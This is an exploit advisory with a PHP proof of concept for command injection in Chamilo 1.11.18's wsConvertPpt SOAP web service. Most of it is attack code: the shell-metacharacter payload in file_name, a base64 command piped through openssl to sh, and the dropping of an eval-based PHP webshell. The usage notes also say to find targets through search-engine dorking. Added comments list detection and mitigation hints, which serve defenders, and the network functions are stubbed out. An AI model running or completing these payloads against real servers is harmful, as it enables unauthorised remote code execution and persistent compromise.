Chamilo 1.11.18 Code Injection
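Chamilo version 1.11.18 suffers from a PHP code injection vulnerability. As the proof of concept below constructs it, the injection point is the file_name field of the wsConvertPpt SOAP call sent to /main/webservices/additional_webservices.php: shell metacharacters in that field lead to command execution on the server, and the PHP code execution stage depends on a file written through that command.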
=============================================================================================================================================
| # Title : Chamilo 1.11.18 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 123 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
// Proof-of-concept skeleton for the Chamilo 1.11.18 issue described above.
//
// What the listing shows:
//   - Every request body is a SOAP envelope calling wsConvertPpt on
//     /main/webservices/additional_webservices.php.
//   - The file_name map entry carries quote and pipe characters followed by a
//     command string, so the server side presumably hands file_name to a shell
//     without escaping it (inferred from the payload shape; the server code is
//     not on this page).
//   - sendRequest() and injectPhpPayloadPng() are placeholders. As published,
//     the script performs no network I/O and check() always returns 'Safe'.
//
// Review notes for defenders, derived from the requests built below:
//   - Log review: POSTs to additional_webservices.php whose wsConvertPpt
//     file_name value contains quote, backtick or pipe characters.
//   - File integrity: unexpected .php files under main/inc/lib/ppt2png/, and
//     POSTs addressed to such files.
//   - Mitigation: apply the vendor's fix for this issue, and block or remove
//     the additional web service where PPT conversion is not used.
class ChamiloExploit {
    // Base URL of the instance, stored without a trailing slash.
    private $targetUri;
    // File name used for the uploaded PHP file.
    private $webshellName;
    // POST parameter name read by the uploaded PHP file; set in uploadWebshell().
    private $postParam;

    // Stores the base URL and the file name; a falsy $webshell (null, '', '0')
    // is replaced by a random name because of the ?: operator.
    public function __construct($targetUri, $webshell = null) {
        $this->targetUri = rtrim($targetUri, '/');
        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();
    }

    // Returns 16 random hex characters followed by '.php'.
    private function generateRandomWebshellName() {
        return bin2hex(random_bytes(8)) . '.php';
    }

    // Builds the SOAP body for wsConvertPpt. $cmd is interpolated unescaped into
    // the file_name value; file_data is left empty and service_ppt2lp_size gets
    // a random "WIDTHxHEIGHT" string.
    private function soapRequest($cmd) {
        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);
        // NOTE(review): the envelope's original line breaks were lost when the
        // page was extracted; it is reproduced here on one line as it appears.
        return <<<EOS
<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{$this->targetUri}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <ns1:wsConvertPpt> <param0 xsi:type="ns2:Map"> <item> <key xsi:type="xsd:string">file_data</key> <value xsi:type="xsd:string"></value> </item> <item> <key xsi:type="xsd:string">file_name</key> <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value> </item> <item> <key xsi:type="xsd:string">service_ppt2lp_size</key> <value xsi:type="xsd:string">{$pptSize}</value> </item> </param0> </ns1:wsConvertPpt> </SOAP-ENV:Body></SOAP-ENV:Envelope>
EOS;
    }

    // First stage of the 'php' payload type: asks the server to write a file
    // named $webshellName through the injected command. Returns whatever
    // sendRequest() returns, or null if the PNG step yields null.
    public function uploadWebshell() {
        // Random 8-hex-character parameter name, so the written file only reacts
        // to a POST field the caller knows.
        $this->postParam = bin2hex(random_bytes(4));
        // Content intended for the written file: it evaluates base64-decoded
        // POST data. This string is the artefact to hunt for on disk.
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);
        // With the placeholder below this branch is never taken, because the
        // placeholder does not return null.
        if ($pngWebshell === null) {
            return null;
        }
        $payload = base64_encode($pngWebshell);
        // The file is written relative to the command's working directory.
        // executePhp() later requests it under /main/inc/lib/ppt2png/, which
        // suggests that is the working directory - TODO confirm on the server.
        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";
        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));
        return $response;
    }

    // Placeholder: the published PoC does not implement this step. $phpPayload
    // is ignored and a fixed pack() result is returned instead.
    private function injectPhpPayloadPng($phpPayload) {
        return pack('H*', '89504E470D0A1A0A...'); // PNG signature bytes followed by a literal '...'
    }

    // Second stage of the 'php' payload type: POSTs base64-encoded $cmd, under
    // the parameter name chosen in uploadWebshell(), to the written file.
    public function executePhp($cmd) {
        $payload = base64_encode($cmd);
        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);
        return $response;
    }

    // Wraps $cmd so it travels base64-encoded and is decoded with openssl and
    // piped to sh on the server, then sends it through the SOAP call.
    public function executeCommand($cmd) {
        $payload = base64_encode($cmd);
        $cmd = "echo {$payload}|openssl enc -a -d|sh";
        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));
        return $response;
    }

    // Echoes a random marker through executeCommand() and reports 'Vulnerable'
    // only when the response contains both 'wsConvertPptResponse' and the
    // marker; anything else, including a falsy response, is reported as 'Safe'.
    public function check() {
        $marker = bin2hex(random_bytes(4));
        $res = $this->executeCommand("echo {$marker}");
        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {
            return 'Vulnerable';
        } else {
            return 'Safe';
        }
    }

    // Dispatches on $payload['type']. There is no default branch, so an unknown
    // type does nothing, and the method returns no value in any branch.
    public function exploit($payload) {
        switch ($payload['type']) {
            case 'php':
                $res = $this->uploadWebshell();
                // A response without 'wsConvertPptResponse' is treated as a failed write.
                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {
                    throw new Exception('Web shell upload error.');
                }
                $this->executePhp($payload['encoded']);
                break;
            case 'unix_cmd':
                $this->executeCommand($payload['encoded']);
                break;
            case 'linux_dropper':
                // Empty in the published PoC.
                break;
        }
    }

    // Placeholder: no HTTP request is made. All four arguments are ignored and
    // a fixed string is returned.
    private function sendRequest($method, $uri, $ctype, $data) {
        return 'Dummy response';
    }
}

// Usage as published: 'http://target.com' is the author's placeholder host, and
// the value returned by check() is discarded rather than printed.
$exploit = new ChamiloExploit('http://target.com', 'webshell.php');
$exploit->check();
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================